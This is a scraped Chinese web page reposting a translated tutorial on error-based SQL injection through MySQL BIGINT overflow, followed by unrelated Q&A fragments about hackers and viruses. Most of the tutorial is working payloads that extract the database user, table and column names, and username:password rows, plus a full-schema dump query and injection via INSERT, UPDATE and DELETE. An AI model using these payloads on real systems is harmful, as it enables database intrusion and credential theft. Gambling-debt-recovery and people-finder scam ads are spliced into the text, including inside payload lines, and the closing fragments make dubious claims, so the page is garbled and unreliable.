专业找人企业怎么找人-根据BIGINT溢出错误的SQL引入
译员:mssp299
0x01 简述
我针对根据MySQL错误获取数据信息的新技术应用十分很感兴趣,而文中时要详细介绍的就这样一种技术性。当我们调查MySQL的整数处理 *** 的情况下,忽然对如何使其产生溢出造成了深厚的兴趣爱好。下边,大家讨论一下MySQL是怎样储存整数的。
(来源于:http://dev.mysql.com/doc/refman/5.5/en/integer-types.html)
仅有5.5.5以及之上版本的MySQL才会造成溢出错误信息,下的版本针对整数溢出不容易推送一切信息。
数据类型BIGINT的长短为8字节,换句话说,长短为64比特。这类数据类型较大 的有标记值,用二进制、十六进制和十进制的表明方式各自为“0b01111111111网上赌博追债两天到账11111111111111111111111111111111111111111111111111111”、“0x7fffffffffffffff”和“9223372036854775807”。 当对这一值开展一些标值计算的情况下,例如加法运算,便会造成“BIGINT value is out of range”错误。
mysql> select 9223372036854775807 1;
ERROR 1网上赌博追债两天到账690 (22003): BIGINT value is out of range in '(9223372036854775807 1)'
为了更好地防止出现上边那样的错误,大家只需将其变换为无标记整数就可以。
针对无标记整数而言,BIGINT能够储放的更高值用二进制、十六进制和十进制表明得话,各自为“0b1111111111111111111111111111111111111111111111111111111111111111”、“0xFFFFFFFFFFFFFFFF”和“18446744073709551615”。
一样的,假如对这一值开展标值关系式计算,如加减法或加减法计算,一样也会造成 “BIGINT 网上赌博追债两天到账 value is out of range”错误。
# In decimal
mysql> select 18446744073709551615 1;
ERROR 1690 (22003): BIGINT UNSIGNED value is out 网上赌博追债两天到账 of range in '(18446744073709551615 1)'
# In binary
mysql> select cast(b'1111111111111111111111111111111111111111111111111111111111111111' as unsigned) 1;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff 网上赌博追债两天到账 as unsigned) 1)'
# In hex
mysql> select cast(x'FFFFFFFFFFFFFFFF' as unsigned) 1;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(cast(0xffffffffffffffff as unsigned) 1)'
如果我们对标值0逐位取反,結果会怎么样呢? 网上赌博追债两天到账 自然是获得一个无标记的较大 BIGINT值,这一点是不言而喻的。
mysql> select ~0;
----------------------
| ~0 |
----------------------
| 18446744073709551615 |
----------------------
1 row in set (0.00 sec)
因此 ,如果我们对~0开展加减法计算得话,也会造成 BIGINT溢出错误。
mysql> select 1-~0;ERROR 1690 (22003): BIGINT value is out of range in '(1 - ~(0))'
mysql> select 1 ~0;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(1 ~(0))'
0x002 引入技术性
我的想法是,运用子查询造成BITINT溢出,进而想方设法获取数据信息。我们知道,假如一个查看取得成功回到,其返回值为0,因此 对其开展逻辑非得话便会变为1,举例来说,如果我们对相近(select*from(select user())x)那样的查看开展逻辑非得话,便会有:
mysql> select (select*from(select user())x);
-------------------------------
| (select*from(select user())x) |
----网上赌博追债两天到账---------------------------
| root@localhost |
-------------------------------
1 row in set (0.00 sec)
# Applying logical negation
mysql> select !(select*from(select user())x);
--------------------------------
网上赌博追债两天到账| !(select*from(select user())x) |
--------------------------------
| 1 |
--------------------------------
1 row in set (0.00 sec)
是的,太美好了! 所以说,要是大家可以组成好逐位取反和逻辑性取反计算,大家就能运用溢出错误来取得成功的引入查看。
mysql> select ~0 !(select*网上赌博追债两天到账from(select user())x);
ERROR 1690 (22003): BIGINT value is out of range in '(~(0) (not((select 'root@localhost' from dual))))'
大家先不应用加减法,由于“ ”根据浏览器工具开展分析的情况下,会被变换为空白符(但是,你能应用+来表明“ ”)。 反过来,我们可以应用加减法。所以说,同一种引入进攻,能够有彻底不一样的变异。 最后网上赌博追债两天到账的查看句子以下所显示。
!(select*from(select user())x)-~0
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
举例来说,我们可以像下边一样,在一个查看句子中开展引入实际操作。
mysql> select username, password from users where id='1' 网上赌博追债两天到账 or !(select*from(select user())x)-~0;
ERROR 1690 (22003): BIGINT value is out of range in '((not((select 'root@localhost' from dual))) - ~(0))'
<http://localhost/dvwa/vulnerabilities/sqli/?id=1' or !(select*from(select user())x)-~0-- 网上赌博追债两天到账 -|&Submit=Submit#>
运用这类根据BIGINT溢出错误的引入技巧,我们可以基本上能够应用MySQL中全部的数学函数,由于他们还可以开展取反,实际使用 *** 以下所显示:
select !atan((select*from(select user())a))-~0;
select !ceil((select*from(select user())a))-~0;select !floor((select*from(select user())a))-~0;
下边的大家早已检测过去了,要是你愿意得话,还能够寻找大量:)
HEX
IN
FLOOR
CEIL
RAND
CEILING
TRUNCATE
TAN
SQRT
ROUND
SIGN
0x003 网上赌博追债两天到账 获取数据信息
获取数据信息的方式,跟别的引入进攻技巧中的一样,这儿只做简易详细介绍。
更先,大家来获得表名:
!(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)-~0
获得字段名:
select !(select*from(select 网上赌博追债两天到账 column_name from information_schema.columns where table_name='users' limit 0,1)x)-~0;
查找数据信息:
!(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0;
0x004 一次性转储
大家可以一次性转储全部数据库查询、列和数据分析表吗? 回答是毫无疑问的。可是,在我们从全部数据库查询转站 储数据表和列的时候,只能得到较少的结果,毕竟我们是通过错误消息来检索数据的。 不过,如果我们是从当前数据库中转储数据的话,一次最多可以转储27个结果。下面举例说明。
!(select*from(select(concat(@:=0,(select 网赌追款48小时到账 count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0
(select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where 网赌追款48小时到账 table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
(select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
网赌追款48小时到账这些限制了我们可以检索的结果的数量,即最多27个。假设,我们在一个数据库中创建了一个31列的数据表。 那么,我们只能看到27个结果,而我的其他4个表和该用户数据表的其他列都无法返回。
0x05 利用插入语句进行注入
利用插入语句,我们也可以进行类似的注入攻击,具体语法为‘’ or (payload) or “”。
mysql> insert into users (id, username, password) values (2, '' or 网赌追款48小时到账 !(select*from(select user())x)-~0 or '', 'Eyre');
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 'root@localhost' from dual))) - ~(0))'
我们还可以使用DIOS查询。
insert into users (id, username, password) values (2, '' or 网赌追款48小时到账 !(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0 or '', 'Eyre');
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range 网赌追款48小时到账 in '((not((select '000
newdb::users::id
newdb::users::username
newdb::users::password' from dual))) - ~(0))'
0x06 利用更新语句进行注网赌追款48小时到账入
利用更新语句,我们照样可以进行类似的注入,具体如下所示:
mysql> update users set password='Peter' or !(select*from(select user())x)-~0 or '' where id=4;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 'root@localhost' from 网赌追款48小时到账 dual))) - ~(0))'
0x07 利用更新语句进行注入
同样的,我们也可以利用删除语句进行注入,具体如下所示:
mysql> delete from users where id='1' or !(select*from(select user())x)-~0 or '';
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 网赌追款48小时到账 'root@localhost' from dual))) - ~(0))'
0x08 小结
本文的攻击之所以得逞,是因为mysql_error()会向我们返回错误消息,只要这样,我们才能够利用它来进行注入。 这一功能,是在5.5.5及其以上版本提供的。对于这些溢出攻击,还有许多不同的形式。 例如:
mysql> select !1-0^222;
ERROR 1690 (22003): BIGINT UNSIGNED value 网赌追款48小时到账 is out of range in '((not(1)) - (0 ^ 222))'
mysql> select !(select*from(select user())a)-0^222;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not((select 'root@localhost' from dual))) - (0 ^ 222))'
此外,后端代码中的引用、双引号或括号问题,也会引网赌追款48小时到账起注入攻击。举例来说,如果利用DVWA修改PHP代码去掉引号, 无需前面类似的或操作就能进行注入了。
#!php
<?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = 网赌追款48小时到账 $id";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i = 0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
网赌追款48小时到账 $last = mysql_result($result,$i,"last_name");
$html .= '<pre>';
$html .= 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
$html .= 网赌追款48小时到账 '</pre>';
$i++;
}
}
?>
<http://localhost/dvwa/vulnerabilities/sqli/?id=!(select*from(select user())a)-0^222 &Submit=Submit#>
我希望本文对大家的渗透测试工作能够有所帮助。
0x09 参考资料
1 http://dev.mysql.com/doc/refman/5.5/en/integer-types.html
2 https://dev.mysql.com/doc/refman/5.0/en/numeric-type-overview.html
3 网赌追款48小时到账 https://dev.mysql.com/doc/refman/5.0/en/mathematical-functions.html
非常高兴回答你的问题。怎样从衣服颜色的选择上看透对方?其实衣服的颜色分为两大类,一个是暖色系,一个是冷色系。首先我们说一下,暖色系橙色,黄色,红色。专业找人公司怎么找人
如何当一个黑客高手网上不是一下就能查询到新闻吗,如果你是想到那黑客的行动全部过程 *** 工具什么的。这不可能有。可以的,确定是黑客入侵可以打 *** 报警你的个人信息又不值钱,应该没必要。除非其他原因,不过大可不必担心。
网赌追款48小时到账专业找人公司怎么找人都是一群骗子,根本不可能实现的,聊天记录是本地记录的,拥有会员才可以上传 *** ,这个是要设置,如果设置了,那么就需要。
可以把硬盘搞烧掉是可能的,主板一般没可能,硬盘就是利用病毒复制功能反复的进行大量文件复制!使硬盘大量工作!然后厉害的可以使你死机之类的,硬盘就烧了!
黑客、 *** 安全保障员与 *** 攻击!分为两种性质!但有一点相同、两者都会编码、代码、易源码 *** 软件! 黑客攻击2013最新实用软件doos‘洪水’攻击、在一瞬间。专业找人公司怎么找人
病毒是一个程序,一段人为网赌追款48小时到账编制的计算机程序代码。它通过想办法在正常程序运行之前运行,并处于特权级状态。这段程序代码一旦进入计算机并得以执行,对计算机。
专业找人公司怎么找人被黑客和病毒入侵,更好的办法就是格式化,你装过系统后再装上新的杀毒和防火墙软件,及时升级,及时更新,一般就没什么问题了。防止黑客只能给你的系统打。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
